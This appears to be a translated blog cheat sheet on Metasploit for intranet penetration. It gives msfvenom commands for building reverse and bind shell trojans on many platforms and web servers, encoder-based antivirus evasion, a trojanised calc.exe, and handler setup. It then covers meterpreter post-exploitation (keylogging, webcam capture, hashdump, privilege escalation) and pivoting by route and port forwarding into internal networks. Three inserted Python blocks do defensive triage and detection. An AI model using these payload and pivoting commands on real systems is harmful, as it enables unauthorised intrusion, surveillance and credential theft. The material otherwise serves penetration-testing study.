Infiltration Artifact Series Metasploit

Learn to walk before you run

Today I did an intranet penetration test, mostly with Metasploit, the intranet penetration artifact. Metasploit is no stranger to me; I have used it for a long time, but every time I come back to it I have forgotten some of its usage. To make lookup easier, I am recording here some common Metasploit commands and how to use them for intranet penetration.

Installing metasploit under Mac

Installing Metasploit on a Mac is relatively simple: download the pkg installer from the official website and install it directly. After installation, take note of the install path.
msfconsole path:

```bash
/opt/metasploit-framework/bin
```

Several other commonly used tools live in this directory as well.

Msf module (exploit plugin) path:

```bash
/opt/metasploit-framework/embedded/framework/modules/exploits
```

msfvenom

Role: generates payload (Trojan) files; it replaces the older msfpayload and msfencode tools.

Options

The msfvenom command line options are as follows:

```
-p, --payload <payload>       payload to use (the attack payload)
-l, --list [module_type]      list all available resources of the given module type: payloads, encoders, nops, all
-n, --nopsled <length>        prepend a NOP sled of the given length to the payload
-f, --format <format>         output format (use --help-formats to list the formats msf supports)
-e, --encoder [encoder]       encoder to use
-a, --arch <architecture>     target architecture of the payload
    --platform <platform>     target platform of the payload
-s, --space <length>          maximum size of the resulting payload
-b, --bad-chars <list>        characters the payload must avoid, for example: '\x00\xff'
-i, --iterations <count>      number of times to encode the payload
-c, --add-code <path>         additional win32 shellcode file to include
-x, --template <path>         custom executable to use as a template
-k, --keep                    preserve the template program's behaviour; the injected payload runs as a new process
    --payload-options         list the standard options of the payload
-o, --out <path>              save the payload to a file
-v, --var-name <name>         custom variable name to use for certain output formats
    --smallest                generate the smallest possible payload
-h, --help                    show help
    --help-formats            list the output formats msf supports
```

Option usage

List the supported payloads:

```bash
msfvenom -l payloads
```

List the supported output formats:

```bash
msfvenom --help-formats
```

List the supported encoders (used for antivirus evasion):

```bash
msfvenom -l encoders
```

List the supported NOP modules (also used for antivirus evasion):

```bash
msfvenom -l nops
```

Basic payloads

Command format:

```bash
msfvenom -p <payload> <payload options> -f <format> -o <path>
```

Linux

```bash
# Reverse connection:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
# Forward (bind) connection:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
```

Windows

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
```

Mac

```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
```

Web Payloads

PHP

```bash
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
# wrap the raw output in a PHP open tag (pbcopy/pbpaste are the macOS clipboard tools)
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
```

ASP

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
```

JSP

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
```

WAR

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
```

Scripting Payloads

Python

```bash
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
```

Bash

```bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
```

Perl

```bash
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
```

Linux Based Shellcode

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
```

Windows Based Shellcode

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
```

Mac Based Shellcode

```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
```

Payload with encoding

Command format:

```bash
msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>
```

Commonly used encoders:

```
x86/shikata_ga_nai
cmd/powershell_base64
```

Example: generate a payload using the calculator (calc.exe) as the template executable:

```bash
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe
```

Payload pitfall

Normally the Trojan file generated by msfvenom can be uploaded to the target server and run directly (after adding execute permission). But I ran into a pitfall myself: part of the generated file's content was invalid, which caused an error, as shown in the figure below.

The solution is to open the file in vim and delete the invalid content from the first two lines of the file.
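A quicker way to see whether a file has junk in front of its real header is to look for the executable's magic bytes and report where they actually start. The following Python is an added example, not code from the original post or from Metasploit: it recognises the header formats that msfvenom writes with -f elf, exe and macho, reports any leading bytes, and for ELF reads whether the file is 32- or 64-bit and for which CPU. The sample file is constructed inline and is not a real payload.

```python
# Added example, not from the original post: identify an executable by its magic
# bytes, report any bytes that precede the header, and read the ELF class and
# machine type. This catches the pitfall above (stray lines before the header)
# and is the same first check used when triaging a suspicious upload.
import struct

# Magic numbers for the formats msfvenom writes with -f elf / exe / macho.
# "MZ" is only two bytes and can occur in text; in real triage confirm the
# PE signature via e_lfanew before trusting it.
MAGICS = {
    b"\x7fELF": "elf",
    b"MZ": "pe",
    b"\xfe\xed\xfa\xce": "macho32",
    b"\xfe\xed\xfa\xcf": "macho64",
    b"\xce\xfa\xed\xfe": "macho32-le",
    b"\xcf\xfa\xed\xfe": "macho64-le",
    b"\xca\xfe\xba\xbe": "macho-fat",
}
ELF_MACHINES = {3: "x86", 62: "x86-64", 40: "arm", 183: "aarch64"}


def find_header(data: bytes, limit: int = 4096):
    """Return (format, offset) of the first recognised header within `limit` bytes, or (None, -1)."""
    for off in range(min(len(data), limit)):
        for magic, fmt in MAGICS.items():
            if data.startswith(magic, off):
                return fmt, off
    return None, -1


def elf_info(data: bytes, off: int) -> dict:
    """Read EI_CLASS (32/64-bit), EI_DATA (endianness) and e_machine from an ELF header at `off`."""
    ei_class, ei_data = data[off + 4], data[off + 5]
    endian = "<" if ei_data == 1 else ">"
    (e_machine,) = struct.unpack_from(endian + "H", data, off + 18)
    return {"bits": 64 if ei_class == 2 else 32,
            "arch": ELF_MACHINES.get(e_machine, hex(e_machine))}


def triage(data: bytes) -> dict:
    """Summarise format, header offset, leading junk and (for ELF) bitness/arch."""
    fmt, off = find_header(data)
    report = {"format": fmt, "header_offset": off,
              "leading_junk": data[:off] if off > 0 else b""}
    if fmt == "elf" and len(data) >= off + 20:
        report.update(elf_info(data, off))
    return report


# Constructed sample: two stray text lines followed by a minimal 32-bit x86 ELF header.
JUNK = b"# stray line 1\n# stray line 2\n"
ELF_HEADER = (b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # class=32-bit, little-endian, version 1
              + struct.pack("<HH", 2, 3))                       # e_type=EXEC, e_machine=EM_386
SAMPLE_WITH_JUNK = JUNK + ELF_HEADER

if __name__ == "__main__":
    r = triage(SAMPLE_WITH_JUNK)
    print(f"format={r['format']} header at byte {r['header_offset']}, "
          f"{len(r['leading_junk'])} junk bytes, {r.get('bits')}-bit {r.get('arch')}")
```

If `header_offset` is greater than zero, the bytes before it are what the vim fix above removes; a header offset of zero with a recognised format means the file is already well-formed.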

msfconsole

Role: starts Metasploit on the command line.

After startup you can see the current Metasploit version and the number of modules of each type:

  • auxiliary: scanning modules
  • exploits: exploit modules
  • payloads
  • encoders: encoding modules
  • nops: NOP (no-op) modules

search: finding modules

For example, to find the exploit module for the ms15_034 vulnerability:

```bash
search ms15_034
```

Earlier I introduced how to generate Trojan files with msfvenom. Here I will show how to use msf to connect to a Trojan file that has been executed on the target server.

Commonly used payloads

First, recall that the command for generating a Trojan file takes a payload option. Here are a few commonly used payloads.
Linux payloads:

```
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp
```

Windows payloads:

```
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
```

Note: x64 payloads only work against targets running a 64-bit operating system; payloads without the x64 marker (or with x86) are for 32-bit systems. Modules containing meterpreter return a meterpreter shell, while the plain shell modules return an ordinary shell (similar to what nc gives you). reverse_tcp means the Trojan actively connects back to the listener; bind_tcp means the Trojan listens on a local port and waits for the attacker to connect. The Trojan file to generate should therefore be decided case by case.

payload selection

Having introduced the commonly used payloads, the three key elements of payload selection are:

  • the direction of the Trojan's connection
  • the target operating system and version
  • the type of shell returned

Trojan connection direction:
msf Trojans are divided into forward (bind) connections and reverse connections. A forward connection suits the case where the attacking machine can connect to the target machine; a reverse connection has the target machine connect to the attacking machine. The connection here generally refers to a TCP port. So before generating a Trojan you need to determine whether the current environment suits a forward-connecting or a reverse-connecting Trojan. (You can test this with the nc tool; for details see [[Infiltration Artifact Series] nc](https://thief.one/SecWeb/%2F2017%2F04%2F10%2F1%2F).)

Checking the target operating system type: this needs no explanation!
Checking whether the operating system is 32- or 64-bit:

```bash
getconf LONG_BIT
```

Type of shell returned:
This mainly depends on what the returned shell is for. If you only need to execute system commands, an ordinary operating-system shell is enough. If you want advanced features such as keylogging, turning on the camera, adding routes and so on, use a meterpreter shell.
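The three elements above are all encoded in the payload's path, which is why the payload lists earlier are readable at a glance. As an added example, not code from the original post or from Metasploit, the following Python decodes a payload path into platform, architecture, shell type, connection direction, transport and staging, and states which side of the firewall a defender should watch for it. The parsing rules are inferred from the payload names on this page (platform first, an optional x86/x64 marker, then the stage and stager segments) and are an assumption, not Metasploit's own API.

```python
# Added example, not from the original post: decode a Metasploit payload path
# into the three selection elements discussed above (connection direction,
# target platform/architecture, shell type) and say what network behaviour a
# defender should expect. The rules below are inferred from the payload names
# listed in this post; they are assumptions, not Metasploit's API.
from dataclasses import dataclass

ARCH_TOKENS = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}


@dataclass
class PayloadProfile:
    platform: str
    arch: str
    shell: str       # "meterpreter" or "shell"
    direction: str   # "reverse" or "bind"
    transport: str   # "tcp", "https", "python", ...
    staged: bool     # stage and stager live in separate path segments


def parse_payload(name: str) -> PayloadProfile:
    segs = name.strip().split("/")
    if len(segs) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = segs[0], segs[1:]
    arch = "n/a"
    if rest[0] in ARCH_TOKENS:
        arch = rest.pop(0)
    elif platform in ("windows", "linux", "osx"):
        arch = "x86"  # no arch marker: the 32-bit build (see the note above)
    if platform == "cmd" and rest[0] in ("unix", "windows"):
        platform += "/" + rest.pop(0)  # cmd/unix/... names a shell family, not an arch
    # e.g. ["meterpreter", "reverse_tcp"] -> ["meterpreter", "reverse", "tcp"]
    tokens = [t for seg in rest for t in seg.split("_")]
    if "reverse" in tokens:
        direction = "reverse"
    elif "bind" in tokens:
        direction = "bind"
    else:
        raise ValueError(f"no connection direction in {name!r}")
    transport = "_".join(tokens[tokens.index(direction) + 1:]) or "unknown"
    shell = "meterpreter" if "meterpreter" in tokens else "shell"
    return PayloadProfile(platform, arch, shell, direction, transport, len(rest) > 1)


def network_indicator(profile: PayloadProfile) -> str:
    """Which traffic direction a defender should watch for this payload."""
    if profile.direction == "reverse":
        return "egress"   # victim connects out to the operator's LHOST:LPORT
    return "ingress"      # victim opens a listener on LPORT; operator connects in


if __name__ == "__main__":
    for n in ("windows/x64/meterpreter/reverse_tcp", "linux/x86/shell_bind_tcp",
              "php/meterpreter_reverse_tcp", "cmd/unix/reverse_python"):
        p = parse_payload(n)
        print(f"{n:40} {p.platform:10} {p.arch:4} {p.shell:11} {p.direction:7} "
              f"{p.transport:7} staged={p.staged} watch={network_indicator(p)}")
```

The `network_indicator` result is the practical consequence of the first element: a reverse payload shows up as an outbound connection from the victim to an unusual port, a bind payload as a new listening port on the victim.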

Connecting to the Trojan

Start msf and use the exploit/multi/handler module:

```bash
use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
# a bind payload listens on the target, so the handler needs the target's address (RHOST);
# for a reverse payload set LHOST to your own address instead
set RHOST 10.0.0.1
set LPORT 12345
exploit
```

Note: the payload set here must be the same payload that was used to generate the Trojan. The remaining parameters are filled in according to the selected payload.

meterpreter shell

Once we have a meterpreter shell on the target server, we can do a lot of things.

```
background        put the session into the background
sessions -i 1     bring session 1 back to the foreground
run vnc           open a VNC remote desktop
```

File management:

```
download   download a file
edit       edit a file
cat        view a file
mkdir      create a directory
mv         move
rm         delete
upload     upload a file
rmdir      delete a directory
```

Network and system operations:

```
arp        view the ARP cache
ifconfig   network interfaces and IP addresses
getproxy   get the proxy settings
netstat    view ports and connections
kill       end a process
ps         view processes
reboot     restart the computer
reg        modify the registry
shell      drop to a system shell
shutdown   shut down the computer
sysinfo    get computer information
```

User operations and other features:

```
enumdesktops     list user desktops/logins
keyscan_dump     keylogger: dump captured keystrokes
keyscan_start    keylogger: start
keyscan_stop     keylogger: stop
uictl            control the keyboard and mouse
record_mic       record audio
webcam_chat      view the camera interface
webcam_list      list cameras
webcam_stream    stream camera video
getsystem        obtain elevated privileges
hashdump         dump password hashes
```

meterpreter: adding a route

Most of the time the meterpreter shell we obtain is on an intranet host, and we need to proxy into the target's intranet to scan its internal servers. For this you can use the route feature to add a route into the target server's intranet.

View the shell's network environment:

```bash
meterpreter > run get_local_subnets
```

Add a route to the target server's intranet (the network depends on the target intranet):

```bash
meterpreter > run autoroute -s 100.0.0.0/8
```

View routing settings:

In general, setting a route in meterpreter is enough to reach the intranet. Sometimes, however, it fails. In that case we can background the session, return to msf> and check the routing table from outside:

```bash
route print
```

If no routing information is shown, the route set in the meterpreter shell did not take effect. We can add the route in msf instead:

```bash
msf > route add 10.0.0.0 255.0.0.0 1
```

Explanation: the trailing 1 is session 1. If the attacker wants to reach resources in the 10.0.0.8/8 network segment, the next hop is session 1. I won't go into what the next hop means here; either way, the attacker can now reach resources on the intranet.

meterpreter port forwarding

Suppose we have scanned the 10.x network segment and found a host running MySQL with a weak account password. We can then log in to that MySQL server from the compromised (pivot) host. If I want to log in to MySQL from the attacking machine instead, I can use port forwarding. (In some cases, machines on the intranet cannot SSH to each other and you have to go through a bastion host.)

In the meterpreter shell, type:

```bash
meterpreter > portfwd add -l 55555 -r 10.0.0.1 -p 3306
```
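Seen from the network, the pivoting described in these two sections (add a route, then sweep the internal segment for MySQL and log in) has a distinctive shape: one internal host that normally talks to a few servers suddenly contacts many hosts on the same port within seconds. The following Python is an added example, not code from the original post or from Metasploit, that flags that fan-out over connection-log lines. The log format `ISO-timestamp src -> dst:port` and the sample lines are constructed for the example; the detection logic is what matters.

```python
# Added example, not from the original post: detect the fan-out pattern a pivot
# host produces when it sweeps an internal segment (here: many distinct hosts on
# 3306 from one source). Log lines are constructed, in an assumed format
# "ISO-timestamp src -> dst:port".
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+):(\d+)$")


def parse_line(line: str):
    """Return (ts, src, dst, dport) or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
    return ts, m.group(2), m.group(3), int(m.group(4))


def detect_fanout(lines, threshold: int = 10, window: timedelta = timedelta(seconds=60)):
    """Alert once per (src, dport) that reaches >= threshold distinct hosts inside `window`."""
    events = sorted(e for e in map(parse_line, lines) if e is not None)
    recent = defaultdict(deque)  # (src, dport) -> deque of (ts, dst) still inside the window
    alerted, alerts = set(), []
    for ts, src, dst, dport in events:
        key = (src, dport)
        q = recent[key]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:   # drop connections that fell out of the window
            q.popleft()
        distinct = {d for _, d in q}
        if len(distinct) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": src, "dport": dport, "hosts": len(distinct),
                           "first": q[0][0].isoformat(), "last": ts.isoformat()})
    return alerts


# Constructed sample: 10.0.0.5 (the pivot) touches twelve hosts on 3306 in twelve seconds;
# 10.0.0.7 is a normal client of a single database; one line is unparseable.
SAMPLE_LOG = [f"2024-05-01T09:00:{i:02d}Z 10.0.0.5 -> 10.0.1.{i + 1}:3306" for i in range(12)] + [
    "2024-05-01T09:00:03Z 10.0.0.7 -> 10.0.1.1:3306",
    "2024-05-01T09:00:30Z 10.0.0.7 -> 10.0.1.1:3306",
    "2024-05-01T09:00:05Z 10.0.0.5 -> 10.0.1.1:22",
    "malformed line",
]

if __name__ == "__main__":
    for a in detect_fanout(SAMPLE_LOG):
        print(f"ALERT {a['src']} reached {a['hosts']} hosts on port {a['dport']} "
              f"between {a['first']} and {a['last']}")
```

The threshold and window are tuning knobs: a database client that talks to one or two servers never trips it, while a sweep of a /24 does within seconds. The same grouping works for a port forward, since the forwarded MySQL login still appears as a connection from the pivot host to 10.0.0.1:3306.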

  • There is a lot of material on Metasploit usage on the web; this post only records some common usages and the pitfalls I hit in personal use.

